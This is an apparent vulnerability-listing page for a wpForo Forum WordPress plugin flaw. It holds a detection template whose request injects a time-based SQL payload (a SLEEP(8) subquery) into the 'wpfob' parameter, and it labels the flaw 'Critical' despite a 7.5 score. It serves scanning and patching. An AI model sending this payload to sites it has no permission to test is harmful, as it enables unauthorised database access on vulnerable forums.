wpForo Forum <= 2.4.14 - SQL Injection
CVE-2026-1581
Verified
Description
wpForo Forum WordPress plugin <= 2.4.14 contains a time-based SQL injection caused by insufficient escaping of the 'wpfob' parameter, letting unauthenticated attackers extract sensitive database information.
Severity
Critical
CVSS Score
7.5
Exploit Probability
2%
Published Date
March 19, 2026
Template Author
shivam kamboj
CVE-2026-1581.yaml
id: CVE-2026-1581
info:
name: wpForo Forum <= 2.4.14 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
wpForo Forum WordPress plugin <= 2.4.14 contains a time-based SQL injection caused by insufficient escaping of the 'wpfob' parameter, letting unauthenticated attackers extract sensitive database information.
impact: |
Unauthenticated attackers can extract sensitive information from the database, leading to data disclosure.
remediation: |
Update to the latest version of wpForo Forum plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-2414-unauthenticated-time-based-sql-injection
- https://nvd.nist.gov/vuln/detail/CVE-2026-1581
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-1581
epss-score: 0.01727
epss-percentile: 0.74776
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/wpforo/"
tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,wpforo,unauth,vkev
http:
- raw:
- |
@timeout: 20s
GET /community/recent/?wpfob=(SELECT/**/1/**/FROM/**/(SELECT/**/SLEEP(8))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'status_code == 200'
- 'contains(body, "wpforo-wrap")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a0047304502203e688069448e7d658822510e27298bbd3ff9da8ad8105a0e1668ff915f5ec3c3022100c6b908392f3ebb4a78a590ad2fddad603b15dd62d20c0cd45a0f5dfcf01faf64:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-1581
CWE ID:
cwe-89
Remediation Steps
Update to the latest version of wpForo Forum plugin.